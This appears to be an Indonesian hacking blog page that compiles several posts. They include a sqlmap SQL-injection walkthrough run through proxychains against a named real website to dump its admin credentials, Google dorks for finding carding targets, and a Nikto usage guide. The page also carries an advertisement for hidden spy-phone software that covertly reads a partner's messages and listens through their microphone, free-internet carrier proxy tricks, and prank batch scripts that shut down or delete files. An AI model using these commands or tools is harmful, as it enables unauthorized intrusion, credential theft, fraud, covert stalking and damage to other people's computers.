IKLAN

Theme images by kelvinjay. Powered by Blogger.

Tutorial

HEBOH

Kuliner

Youtube Tutorial

Games

Lowongan Kerja

OpenSource

Cara Remote Server Menggunakan Sqlmap

Pada tutor kali masih membahas pada dunia hacking, bagaimana mengexploitasi server lewat situs yang di dalam terdapat bugs, bugs tersebut yang menjembatani kita untuk remote/mengendalikan lewat shell yang kita tanam pada server,...

oke langsung pada topik masalah, kali ini saya mempunya bugs, contohnya yang sudah saya install pada server local saya
ex: http://localhost/weak.php?id=10

pada dasarnya sebelum kita melakukan hacking, terlebih dahulu kita melakukan information gathering, atau mengunpulkan data-data dari server target,

jalankan aplikasi sqlmap kalian
$ python ./sqlmap.py -u "http://localhost/weak.php?id=10" --dbs
gunanya adalah mengetahui nama database dari server target, kita bisa menggunakan option --tables untuk melihat isi table database, dan --dump untuk melihat semua isi dari setiap table database yang ada

Fingerprinting the remote system and its database
berguna untuk mengumpulkan segenap informasi dasar dari target sasaran database kita, untuk option -b berguna mengetahui banner dari database target
$ python sqlmap.py -u "http://localhost/weak.php?id=10" -b

.....

[11:19:51] [INFO] the back-end DBMS is MySQL
[11:19:51] [INFO] fetching banner
[11:19:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:19:51] [INFO] retrieved: 5.1.61
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
banner: '5.1.61'
perhatikan output diatas, '5.1.61" adalah versi database mysql server, kalian bisa cari di google vuln tentang mysql 5.1.61, gunanya untuk mencari kelemahan, bisa buat drop database situs target

pada perintah selanjutnya kita akan menangkap informasi mengenai users dan roles dari database target
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10

..........

database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'

.............

database management system users password hashes:
[*] [1]:
password hash: NULL
[*] root [2]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
password hash: NULL

........

[*] %root% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

cara mengetahu informasi current user, current database and hostname 

$ python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10
........
[11:32:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[11:32:33] [INFO] fetching current user
[11:32:33] [INFO] retrieving the length of query output
[11:32:33] [INFO] retrieved: 14
[11:32:38] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[11:32:38] [INFO] fetching current database
[11:32:38] [INFO] retrieving the length of query output
[11:32:38] [INFO] retrieved: 5
[11:32:40] [INFO] resumed: profile_data
current database: 'profile_data'
[11:32:40] [INFO] fetching server hostname
[11:32:40] [INFO] retrieving the length of query output
[11:32:40] [INFO] retrieved: 21
[11:32:48] [INFO] retrieved: localhost.localdomain
hostname: 'localhost.localdomain'
[11:32:48] [INFO] testing if current user is DBA
[11:32:48] [INFO] fetching current user
current user is DBA: False

Membaca system file database

Pada mysql jika pengguna database memiliki izin untuk melakukan operasi FILE, maka dia dapat membaca file dari keseluruhan sistem file. namun hal  ini hanya dapat membaca file-file yang dapat dibaca umum atau dibaca oleh pengguna mysql. Berikut adalah contoh cepat untuk membaca file / etc / passwd.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();"

...........

[11:50:22] [INFO] retrieved: 2013-04-15 11:51:10
select now();: '2013-04-15 11:51:10'



Google Dork Carding

inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"

inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"

inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"

inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"

inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"

SQLmap Web Database Pentesting

Sahabat blogger, tentu kalian tidak asing lagi dengan tool yang satu ini, terutama pecinta pentesting, banyak sekali defacer menggunakan trik ini untuk mengatahui database suatu web sakaligus passwordnya, tapi tidak ada salahnya kita mencoba..
namun sebelumnya saya sampaikan, tolong ilmu ini hanya sekedar pembelajaran saja sucuil ilmu tentang pentesting security, mohon janga disalah gunakan..

Untuk menghindari tindakan kriminal, saya dalam menulis artikel ini hanya sebatas menyampaikan hasil dari vuln dan deface dari hacker luar negeri, jadi murni bukan dari saya pribadi, karena maksud saya menulis artikel ini hanya sebatas menyampaikan dan menularkan ilmu kepada teman-teman semuanya...
jadi mohon jangan disalah gunakan, ok ^_^

sebelumnya siapkan dulu alat tempurnya, yaitu sqlmap..
bagi kalian pengguna distro pentesting seperti backtrack dan blackbuntu tentu tidak usah repot-repot install aplikasi ini karena sudah default terinstall di kedua distro tersebut, namun pentesting dapat dilakukan di distro manapun, karenan kemampuan anda menggambarkan reputasi anda, bukan berbagai tools yang anda miliki, toh tools yang anda pakai adalah buatan orang lain, apalagi berbasis GUI,, gak banget deh 
bagi pengguna ubuntu seperti saya install dulu aplikasinya, jangan lupa tambahkan repo backtrack, caranya dapat dilihat disini Update dan Upgrade Java MacBuntu rasa BackTrack.
silahkan install sqlmapnya, jangan lupa jalan di root


root@arum:/home/sandy# apt-get install sqlmap
klo sudah install akan nampak seperti ini 

setelah aplikasi sqlmap terinstall sekarang kita cari target, tentunya yang mempunya vuln,
dan saya tegaskan saya tidak berniat jahat untuk merusak, untuk anda lebih percaya bahwa tujuan saya adalah "baik-baik" maka saya akan memilih target yang pernah dijamah hacker luar, sepertinya hacker dari turki, untuk meyakinkan silahkan kunjungi alamat berikut http://www.hanhdance.com/
lihat laman utamanya, sudah pernah di deface orang lain kan?

tips selanjutnya, agar lebih aman dalam melakukan pentesting sebagai anda menggunakan jalur proxy, sukur-sukur ssh tunneling,
kalian dapat menggunakan tools proxychains, untuk konfigurasinya dapat kalian lihat di sini 

Tunneling ssh dengan PAC Tunnel Manager di Ubuntu

Tunneling SSH di Linux Ubuntu

dan vuln websitenya adalah : http://www.hanhdance.com/gallery.php?id=47

itu target kita gan, buka aplikasi sqlmap atau bisa melalui terminal, jangan lupa status root


root@arum:/home/sandy# cd /pentest/database/sqlmap/
root@arum:/pentest/database/sqlmap# 

root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u www.webtarget.com --dbs
maka: 
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 --dbs
dan nampak list databasenya

available databases [3]:                                                       
[*] hanhdanceeditor
[*] information_schema
[*] test

root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.webtarget.com -D nama_database --tables
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor --tables
dan nampak list tables dari database hanhdanceeditor

root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.webtarget.com -D nama_database -T nama_tables --columns
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor -T admin_users --columns
maka akan terlihat list columns
Database: hanhdanceeditor                                                      
Table: admin_users

sekarang finalisasi eksekusi deh pass dan user dengan dump
root@arum:/pentest/database/sqlmap#proxychains python sqlmap.py -u www.webtarget.com -D nama_database -T nama_tables --dump
root@arum:/pentest/database/sqlmap#proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor -T admin_users --dump
taraaaa, password dan usernya sudah terlihat
Table: admin_users
sekarang buka laman berikut dan masukan user dan passwordnya



Halaman Admin Target





silahkan dicoba, tapi ingat jangan disalahgunakan ea? ^_^





Scanning website vulnerabilities with Nikto

Nikto is a free (GPL) tool for scanning the vulnerabilities of a webhost. It scans for dangerous CGI files, outdated versions, HTTP server options and installed web servers and their options. It also scans open ports, which can be exploited by hackers. It can save reports in plain text, XML, HTML, NBE or CSV.
Requirements:
  1. Perl Environment (No knowledge necessary)
Installation: Download the compressed file and uncompress it. It should be ready to use, given perl is installed.
Usage Examples:
1. Scanning a host:
For a simple example, we scan www.example.com
perl nikto.pl -h example.com
- ***** SSL support not available (see docs for SSL install) *****
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 72.41.204.238
+ Target Hostname: example.com
+ Target Port: 80
+ Start Time: 2011-09-08 20:25:40
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ robots.txt contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS
+ /WEB-INF/web.xml: JRUN default file found.
+ /admin.cgi: InterScan VirusWall administration is accessible without authentication.
+ /interscan/: InterScan VirusWall administration is accessible without authentication.
+ /SUNWmc/htdocs/: Sun SMC (Solaris Management Console) is running.
+ OSVDB-35878: /modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*: PHP-Nuke module allows user names and passwords to be viewed.
+ OSVDB-682: /webalizer/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /Administration/: This might be interesting...
+ OSVDB-3092: /administration/: This might be interesting...
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ /readme.html: This WordPress file reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /administration/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ 6448 items checked: 49 error(s) and 21 item(s) reported on remote host
+ End Time: 2011-09-09 00:59:54 (16454 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
It took a whooping 16454 seconds to complete the scan.
2. If we want to test an open port, we can pass port number(s) as:
perl nikto.pl -h example.com -p 80,443
Port 80 is default
3. We can also set proxy:
To use system wide proxy, use -useproxy option:
perl nikto.pl -h example.com -p 80,443 -useproxy
To specify a proxy manually, we can pass it as:
 perl nikto.pl -h example.com -p 80,443 -useproxy http://10.0.0.2:8888
4. To save the result as a specific format, use the -Format option.
perl nikto.pl -h example.com -Format htm
The supported -Format arguments are csv, htm, msf, txt and xml
5. Nikto supports plugins for scanning a target. Plugins allow other bits of code to hook into Nikto’s processing. We can specify which plugins to run against the host. For example:
perl nikto.pl -h example.com -Plugins embedded; content_search; headers
Plugins are separated by semi colon. @@ALL can be specified to run all the plugin, @@NONE runs no plugins, @@DEFAULT runs default plugins and @@MUTATE runs mutate plugins, which are meant to guess values like password files, directory names, sub-domains against a host.
@@DEFAULT runs the following plugins:
httpoptions;headers;mutiple_index;outdated;put_del_test;auth;report_xml;report_nbe;apacheusers;report_metasploit;cookies;embedded;apache_expect_xss;ssl;favicon;cgi;content_search;report_csv;msgs;report_html;tests(report:500);report_text;robots
To get a complete list of plugins, use:
perl nikto.pl -list-plugins
We can also pass parameters to plugins in the following format:
plugin-name[(parameter name[:parameter value ][,other parameters] )]
For example: tests(report:500)
6. Tuning the tests: -Tuning option can be used to specify the type of tests we want to perform on the host. For example, to test file uploads, use:
perl nikto.pl -h example.com -Tuning 06
To exclude a particular test, use x:
perl nikto.pl -h example.com -Tuning x06
By default, all the tests are preformed. List of available tests can be found in the official docs at http://cirt.net/nikto2-docs/options.html
7. Specifying a configuration file: We can tell Nikto to use a config file using -config option. A default config file (nikto.conf) is available in the downloaded tar of Nikto.
perl nikto.pl -h example.com -config nikto.conf
8. Controlling the display: Using the -Display parameter, we can control the type of information we want to see from Nikto. For example:
perl nikto.pl -h example.com -Display V
prints complete verbose information.
perl nikto.pl -h example.com -Display V
- ***** SSL support not available (see docs for SSL install) *****
- Nikto v2.1.4
---------------------------------------------------------------------------
V:Thu Sep 8 06:01:40 2011 - Initialising plugin nikto_apacheusers
V:Thu Sep 8 06:01:40 2011 - Loaded "Apache Users" plugin.
V:Thu Sep 8 06:01:40 2011 - Initialising plugin nikto_embedded
V:Thu Sep 8 06:01:40 2011 - Loaded "Embedded Detection" plugin.
V:Thu Sep 8 06:01:40 2011 - Initialising plugin nikto_content_search
V:Thu Sep 8 06:01:40 2011 - Loaded "Content Search" plugin.
V:Thu Sep 8 06:01:40 2011 - Initialising plugin nikto_report_html
V:Thu Sep 8 06:01:40 2011 - Loaded "Report as HTML" plugin.
V:Thu Sep 8 06:01:40 2011 - Initialising plugin nikto_put_del_test
V:Thu Sep 8 06:01:40 2011 - Loaded "Put/Delete test" plugin.
V:Thu Sep 8 06:01:40 2011 - Initialising plugin nikto_report_msf
V:Thu Sep 8 06:01:41 2011 - Loaded "Report data to Metasploit" plugin.
V:Thu Sep 8 06:01:41 2011 - Initialising plugin nikto_core
...
...

9. -output option is used to specify the output file. The format is taken from the file extension, unless overridden by -Format option.
10. Single request mode: Instead of allowing Nikto to perform multiple TCP requests, we can specify a single request mode. In this case, Nikto prompts for the required options.
perl nikto.pl -Single
-------------------------------------------- Nikto 2.1.4
-------------------------------------------- Single Request Mode
Hostname or IP: example.com
Port (80):
URI (/):
SSL (0):
Proxy host:
Proxy port:
Show HTML Response (1):
HTTP Version (1.1):
HTTP Method (GET):
User-Agent (Mozilla/4.75 (Nikto/2.1.4):
Connection (Keep-Alive):
Data:
force_bodysnatch (0):
force_close (1):
http_space1 ( ):
http_space2 ( ):
include_host_in_uri (0):
invalid_protocol_return_value (1):
max_size (0):
protocol (HTTP):
require_newline_after_headers (0):
retry (0):
ssl_save_info (0):
timeout (10):
uri_password ():
uri_postfix ():
uri_prefix ():
uri_user ():
Enable Encoding (0):
-------------------------------------------- Done with questions
Host Name: example.com
Host IP: 72.41.204.238
HTTP Response Code:
-------------------------------------------- Connection Details
Connection: Keep-Alive
Host: example.com
User-Agent: Mozilla/4.75 (Nikto/2.1.4
data:
force_bodysnatch: 0
force_close: 1
force_open: 0
host: example.com
http_space1:
http_space2:
ignore_duplicate_headers: 1
include_host_in_uri: 0
invalid_protocol_return_value: 1
max_size: 0
method: GET
port: 80
protocol: HTTP
require_newline_after_headers: 0
retry: 0
ssl: 0
ssl_save_info: 0
timeout: 10
trailing_slurp: 0
uri: /
uri_param_sep: ?
uri_postfix:
uri_prefix:
version: 1.1
-------------------------------------------- Response Headers
error: error reading HTTP response
http_data_sent: 1
uri: /
-------------------------------------------- Response Content

CARA MEMANTAU SMS PACAR..ATAU ORANG YANG KITA CURIGAI.

sory sebelumnya aku post lagi.. soalnya banyak anak baru..^^ kaga papa kan.. ^^
hay semua’ pa kabar nih.? pasiti lagi baik2 kan.? nga usah banyak basah basih de..hehehe.
sekarang kita masuk dalam pembahasan petama untuk bulan ini.
Jika anda curiga pasangan anda tidak jujur dan menyembunyikan sesuatu dari anda atau mungkin karyawan anda tidak jujur atau mungkin anda ingin memonitor pergaulan dari anak-anak anda agar terhindar dari narkoba dan pergaulan bebas yang salah? pastikan anda memiliki technology SPY PHONE – technology tercanggih abad ini yang dirancang untuk pemantauan aktifitas SMS dan HP orang yang anda curigai.
Technology ini berupa software yang harus anda install terlebih dahulu ke HP target – anda hanya membutuhkan 10 menit untuk install software ini ke HP target dan jangan khawatir, software tidak akan dapat terdeteksi didalam menu HP.
Semua aktifitas pemantauan dan pemonitoran dapat dilakukan DIRECT LIVE dari HP anda , tanpa batas jarak, tanpa diketahui. Software dapat dimatikan dan diaktifkan jarak jauh tanpa harus menyentuh HP target.
SPY PHONE FEATURES :
SMS PRO
Anda dapat mengetahui SEMUA isi SMS masuk dan keluar dari HP target, lengkap dengan nomor nya langsung di HP anda.
SMS GPRS
Anda dapat mengetahui SEMUA isi SMS masuk dan keluar dari HP target, lengkap dengan nomor nya langsung di email anda. Fitur ini sangat menarik dan sesuai digunakan bagi target yang aktifitas SMS nya sangat tinggi, karena pada saat data dikirim ke email, target hanya dikenakan biaya GPRS yang sangat murah
VOICE
Anda dapat mendengarkan aktifitas suara disekitar HP target, tanpa diketahui. Caranya; anda dapat menelephone HP target, secara otomatis Microphone HP target akan menjadi AKTIF dan anda dapat mendengarkan suara-suara disekitar HP tsb tanpa diketahui. Tidak akan ada Lampu menyala atau Vibrate / Getar, dan Tidak akan ada nada panggilan masuk ataupun Misscall, sehingga target tidak akan mengetahui jika anda sedang memonitor dia.
CALLER NUMBER
Anda dapat mengetahui setiap nomor telephone masuk dan keluar dari/ke HP target di HP anda
CALLER NUMBER GPRS
Anda dapat mengetahui setiap nomor telephone masuk dan keluar dari/ke HP target via email
INTERCEPTOR
Anda juga dapat mendengarkan suara dan percakapan target LIVE pada saat dia menerima panggilan.
SIM
Anda akan mengetahui jika target ganti SIM CARD, dan anda tetap dapat memonitor HP target walaupun target menggantikan nomor SIM CARD nya.
BTS TRACK
Anda dapat mengetahui posisi HP target berdasarkan BTS terdekat, informasi yang anda dapatkan adalah nama kota atau nama daerah atau posisi BTS terdekat
VIRTUAL SMS new
Anda dapat mengirimkan SMS ke HP target, menariknya adalah anda dapat mengatur sendiri nama/nomor yang akan muncul di HP target nanti.
PHONE BOOK new
Anda dapat mengakses phone book target dan mendelete data phonebook yang tidak diinginkan.
RECORDING new
Dengan software ini, obrolan telephone HP target akan secara otomatis direkam dan hasil rekaman akan dikirim via email
GPS PRO new
Anda dapat mengetahui keberadaan posisi HP target secara akurat via satelit. Informasi yang anda dapat akan berupa koordinat, angka koordinat tsb dapat dimasukkan ke software yang kami kasih dan anda akan dapat mengetahui posisi target secara rinci sampai ke nama jalan, daerah dan kota dimana dia berada.
GPS new
Anda dapat mengetahui record perjalanan HP target secara akurat via email
PHONE DEAD new
Anda dapat mendengarkan suara disekitar HP target, pada saat HP target dalam kondisi mati.
tapi ingat jangan di pake yang enga” ya..haha..
tu download aja sekarang

Settingan Opera Mini Untuk Internet GRATIS ALL OPERATOR

Three
Jalur Akses : standar
HTTP Server : http://server4.operamini.com:80/
Socket Server : socket://server4.operamini.com:1080/
Remove Port : ya
Proxy Type : HTTP
Proxy Server : 0.facebook.com.server4.operamini.com:80
Settingan opmin untuk THREE diatas sudah saya coba di pulsa minim

XL
Jalur Akses : standar
HTTP Server : http://server4.operamini.com:80/
Socket Server : socket://server4.operamini.com:1080/
Remove Port : ya
Proxy Type : Host
Proxy Server : 0.facebook.com
Settingan opmin untuk XL diatas sudah saya coba dan hasilnya Full Gretonk

Telkomsel
Jalur Akses :
APN = telkomsel
Proxy = 82.145.209.253
Port = 80
HTTP Server : http://m.skype.com.server4.operamini.com:80/
Socket Server : socket://m.skype.com:1080/
Remove Port : ya
Proxy Type : HTTP Proxy Server : m.skype.com
Settingan opmin untuk TELKOMSEL diatas sudah saya coba di SC Masa Tenggang

Indosat
Jalur Akses :
APN = indosatgprs
Proxy = 82.145.209.253
Port = 80
HTTP Server : http://server4.operamini.com:80/
Socket Server : socket://mini4-1.operamini.com:1080/
Remove Port : ya
Proxy Type : HTTP
Proxy Server : qtel.gdeasia.com

Axis
Jalur Akses :
APN = axismms
Proxy = 203.78.116.56 /203.78.116.55
Port = 80
HTTP Server : http:// wap.axisworld.co.id.server4.operamini.com:80/
Socket Server : socket://wap.axisworld.co.id:1080/ Remove Port : no
Proxy Type : HTTP
Proxy Server : wap.axisworld.co.id
NB :
- Untuk Nokia S40 buat file prov terlebih dahulu Trik Internet Gratis Lewat Browser Handphone

XL
APN : www.xlgprs.net
Proxy : 209.141.6.77 / 216.155.153.105
Port : 80
Masuk ke goklik.co.id terlebih dahulu, setelah itu anda masukan situs tujuan didalam kolom lalu klik go

Telkomsel
TRIK 1
APN : telkomsel
Proxy : 192.168.9.17 /192.168.9.16 / 192.168.62.41
Port : 9201
Akhir akhir ini trik telkomsel di atas ini memang hanya bisa digunakan di jam jam tertentu

TRIK 2
APN : telkomsel
Proxy : 118.98.233.20
Port : 80
Ketika ingin browsing dan download silakan masukan URL ini didepan situs tujuanhttp://my.telkomsel.com/cgi-bin/nph-proxy.cgi/000010A/http/
klik URLTUJUAN

TRIK 3
APN : telkomsel
Proxy : 69.195.136.106
Port : 80
masuk ke m.skype.com terlebih dahulu, setelah itu anda masukan situs tujuan didalam kolom lalu
klik go

TRIK 4
APN : telkomsel
Proxy : 66.220.147.21
Port : 80
cuma bisa di gunakan untuk berselancar di Facebook

Three
APN : 3gprs
Proxy : 208.77.23.4
Port : 80
Masuk ke 0.facebook.com terlebih dahulu, setelah itu anda masukan situs tujuan didalam kolom lalu klik go

Indosat
APN : indosatgprs
Proxy : 69.10.57.138 / 82.145.209.49
Port : 80
Masuk ke 0.facebook.com terlebih dahulu, setelah itu anda masukan situs tujuan didalam kolom lalu klik go

Axis
APN : axismms
Proxy : 203.78.118.12
Port : 80
hompage : wap.axisworld.co.id/
Bisa langsung di pakai di browser bawaan hp atau di mozilla dan browser PC lainnya NB :
- Trik BH ini juga bisa di gunakan di PC
- Trik BH untuk TELKOMSEL, XL, dan THREE sudah saya coba dan berhasil

[JAHIL] Dengan Script Notepad

Trik ini bisa kita pakai, untuk menjahili computer seseorang gan. Yang harus agan siapin adalah Program Notepad. Dan copy script di bawah ke dalam notepad.

1.message yang nongol melulu

@ECHO off
:Begin
msg * muka agan jelek
msg * ngaca dulu gih
msg * hayo lo gan,cpu ente ane acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

save namafile.BAT


2.bikin shutdown+message

@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka agan standar abis"
save namafile.BAT


3.Mainin Caps Lock button

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save namafile.vbs


4.buka tutup CD/DVD

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save namafile.vbs


5.bikin vbscript nongol melulu

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

save namafile.vbs



6.tekan tombol backspace melulu

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

save namafile.vbs


7.otomatis ngetik "agan jelek banget sih" di notepad/word

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "agan jelek banget sih!!!"
loop

save namafile.vbs


8.buka notepad trus menerus

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

save namafile.BAT


9.otomatis buka notepad lalu ngetik apa yg agan mau

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys "gan "
WScript.Sleep 50
WshShell.SendKeys "ma"
WScript.Sleep 50
WshShell.SendKeys "ho"
WScript.Sleep 50
WshShell.SendKeys " ba"
WScript.Sleep 50
WshShell.SendKeys "ng"
WScript.Sleep 50
WshShell.SendKeys "et"
WScript.Sleep 50
WshShell.SendKeys " d"
WScript.Sleep 50
WshShell.SendKeys "e"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

save namafile.vbs


scrip tambahan

@echo off
title quiz hari ini
:menu
cls
echo jika agan kena virus apa yang agan lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka agan jelek sih
msg * ngaca dulu gih
msg * hayo lo gan,cpu ente ane acak2
msg * ud install ulang aja
msg * biar masalah nya kelar, hihihi
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

nah script diatas save jadi quiz.bat kasih ke temen..


ane ga tanggungjawap klo ada ape2 lho gan, sekedar share ajah... 

 
Sumber :Kaskus. 

Mozilla add Ons Hacking

Mozilla add Ons adalah Tools atau software tambahan yang langsung Plugin terhadap Mozilla.Berdasarkan pengalaman jangan menginstall mozilla add Ons terlalu banyak karena dapat membuat Browsing menjadi lama.Install beberapa Mozilla add Ons yang benar sesuai dengan kebutuhan dan kepentingan.Dalam melakukan Hacking atau Cracking seorang Hacker atau Cracker sering menggunakan beberapa Mozilla add Ons baik yang digunakan Newbie(Hacker Pemula) maupun Hacker yang sudah advance.Jika anda ingin mencobanya silahkan Install dan download langsung dari situsnya.Berikut merupakan daftar Mozilla add Ons Hacking:

Fire Encrypter 4.0
https://addons.mozilla.org/en-US/firefox/addon/3208

Advanced Dork: 2.3.3.4
https://addons.mozilla.org/en-US/firefox/addon/3208

hackbar:
https://addons.mozilla.org/en-US/firefox/addon/3899

Find in Frame Hack:
https://addons.mozilla.org/en-US/firefox/addon/1075

firebug:
https://addons.mozilla.org/en-US/firefox/addon/1843

anonymouser:
https://addons.mozilla.org/en-US/firefox/addons/versions/1415

live http header:
https://addons.mozilla.org/en-US/firefox/addon/3829

web developer:
https://addons.mozilla.org/firefox/addon/60

downthemall:
https://addons.mozilla.org/en-US/firefox/addon/201

firePHP:
https://addons.mozilla.org/en-US/firefox/addon/6149

foxTOR:
https://addons.mozilla.org/en-US/firefox/addon/3606

cookieSwap:
https://addons.mozilla.org/en-US/firefox/addon/3255

Anonymization Toolbar:
https://addons.mozilla.org/en-US/firefox/addon/2217

Slavehack Toolbar:
https://addons.mozilla.org/en-US/firefox/addon/4190

Page Hacker:
https://addons.mozilla.org/en-US/firefox/addon/5753

PasswordMaker:
https://addons.mozilla.org/en-US/firefox/addon/469

SQL Inject Me:
https://addons.mozilla.org/en-US/firefox/addon/7597

XSS Me:
https://addons.mozilla.org/en-US/firefox/addon/7598

refspoof:
https://addons.mozilla.org/en-US/firefox/addon/4513

X-Forwarded-For Spoofer:
https://addons.mozilla.org/en-US/firefox/addon/5948

Modify Headers:
https://addons.mozilla.org/en-US/firefox/addon/967

X-Forwarded-For Spoofer:
https://addons.mozilla.org/en-US/firefox/addon/5948

Warning : Gunakan Ilmu anda untuk Hal yang Positif.